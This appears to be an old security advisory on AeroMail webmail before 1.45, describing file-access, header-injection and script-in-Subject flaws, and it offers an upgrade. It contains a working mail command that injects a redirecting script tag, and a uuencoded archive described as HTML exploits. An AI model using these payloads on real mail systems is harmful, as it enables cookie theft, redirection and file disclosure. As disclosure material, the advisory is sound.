COMMAND

	AeroMail remote file access, java and header code insertion

SYSTEMS AFFECTED

	AeroMail versions before 1.45

PROBLEM

	Ulf Harnhammar says :
	

	1) When sending e-mails, you can trick  the  attachment  subsystem  into
	sending local files from the web server  or  remote  files  from  URL\'s
	instead of uploaded files as it should.
	

	How is that possible? Well, after PHP has uploaded a  file,  it  sets  a
	few variables with information about it. One of  them  is  the  filename
	under which the  uploaded  file  has  been  temporarily  stored.  It  is
	important to check that this variable was set by uploading  a  file.  It
	might also be normal POSTed data, in which case you  end  up  with  this
	problem.
	

	2) You can  add  additional  headers  to  outgoing  e-mail  messages  by
	sending some normal data for the To or Cc or Subject fields, a CRLF  and
	then another header  with  some  data.  This  can  be  used  for  adding
	uuencoded attachments up in the headers with lines ending in CR  instead
	of CRLF, as previously discussed on Bugtraq.
	

	3) JavaScript  and  HTML  code  is  active,  when  Subject  headers  are
	displayed. This allows DOS attacks  by  redirecting,  theft  of  cookies
	etc.
	

	Issues  1  and  2  require  a  valid  user/password  combination  to  be
	exploited, while issue 3 is open to anyone.
	

	 Exploits :

	 ========

	

	Here are HTML exploits for issues 1 and 2. They  are  distributed  as  a
	uuencoded, gzipped tar archive.
	

	Issue 3 doesn\'t need a special exploit -  you  just  send  an  ordinary
	mail:
	

	mail -s \'<script>self.location.href=\"http://www.kuro5hin.org/\"</script>\' \\

	metaur@prontomail.com < /dev/null

	

	

	

	begin 644 aeromail_exploits.tar.gz

	M\'XL(\"!9R@CP``V%E<F]M86EL7V5X<&QO:71S+G1A<@#M5FUOVS80]F?]BJL&

	M;\"TPF[(MQYEG!VT<`PF0-Z0.VGT*:(FVV$FB1E)QLU^_HR0G?EOL8AG:;GP`

	M03B2]\\KCW5$F14)Y?,<^9[\'@6I\':B\\/S?*_;Z>#?\\[H\'_LJ_0LWK^K[G=YM>

	MLU7#K^MW:]!Y>5,VD2M-)4`MCZ?/G]NQ_YV\";MS_^DJS$>DD_B<ZO*;G\'?C^

	MW]U_J]-NK]U_%]=JX+V4D\\_A?W[__5<G5\\/Q;]<C.!U?G,/U[?\'YV1#<.B$?

	MVD-\"3L8GY8;?\\)HPEC157\'.1TIB0T:7KN)\'668^0^7S>F+<;0L[(^(:8A/%)

	M+(1BC5\"\'[I\'3-TOFQVB(/\\UUS([>8:9=8*;!J,PT:/9)N>/T$Z8I&.%U]D?.

	M[P?N4*2:I;H^?LB8\"T%)#5S-/NM\"WZ\\01%0JI@=<B?KA8>>7>M,H)J5*IS\\1

	MX0-,9H&(A1RX/TP+N&`$(%FFH@LQ3W]?(NDJ[=ROTL:CYE8_<!EU3H5,`%V)

	M1#APKZ_>CU%B8.(W6`[</<>UI!&(Y/\'Q$<72\\\"YA2M$9:V11AJH^2*[1:9@\\

	M0!]C(]ETX)JS6O1,M\'+Y-I,8EH+?\"\'./;N,IG/Y(<XR.3\".:)%3V\"3UR>`HM

	M?\'>-?F:,Y&F6:]`85[2*AR%+74AI@I1D.I=(W=,X1_+L\\OCJHPN*_XF$<=X9

	MBUY_(H]699B(+B1HL3C?08;BK#,,=C`%P2;3.ZUI$,\'K>40U3\'G,0$BXO3D\'

	M+<#$ZLT.F;3@7Y*[<(HP\'9\",*C4/5W7=F:/PFIN`:Z9^AD]8*@\"3CDE0PEPJ

	M3V>@C3U<P83/<$_DLV@_2PKI6\\QI>?[AFAV&K7)<1VS%^3F/8Y@P\"&@<LQ#0

	M5G/BXNQBY)BT9U+M:8TAMEBS-2Y&R\'Y2=?%6UZ4Z+LVRF`?4/`0B`LUT76G)

	M:+)0]#Z??&*!WJ%$E:<V<^487WK%:\\Y3%%VQF!K@@A1SA>=-%8E5R8AU8G&T

	M$K*B%E4E7#^&9?\'.<<EPFE=N.(@17Y2<HMA][=*^%W;W_]:_WO^[IN?;_O]5

	M\\$WU_]9_I/^WOJ?^?RDTZ\\&)2\'_2D$G4\"*/+\\>@&Z-1T.M-/8HJ-K^PGIL70

	M]`\'$M-A9U$SU@J/$6LDV$\\2V@KW59>=C_;2PL][LP2F3#%!2T:V?=EH]0`V2

	M@F&JW%(;Y?]Q2%DSQ\\PFV\\S!\\A\"]S;.0:M;(\\X9:4MA>,H7\"E,TA$7)IW^\\]

	M;\\HS45U,-5544Y&RY:#NY*RFD(K=^S+><F:H>+^,M1P,=HX#R_FQ.A.LW<KC

	M*+#M:C:?YU/L.TMWLTCUI]V#O5+%CAL6%A86%A86%A86%A86%A86%A86%A;?

	+\'/X\"S&R_G``H````

	`

	end

	

	

	

SOLUTION

	Upgrade to version 1.45 [http://the.cushman.net/projects/aeromail/]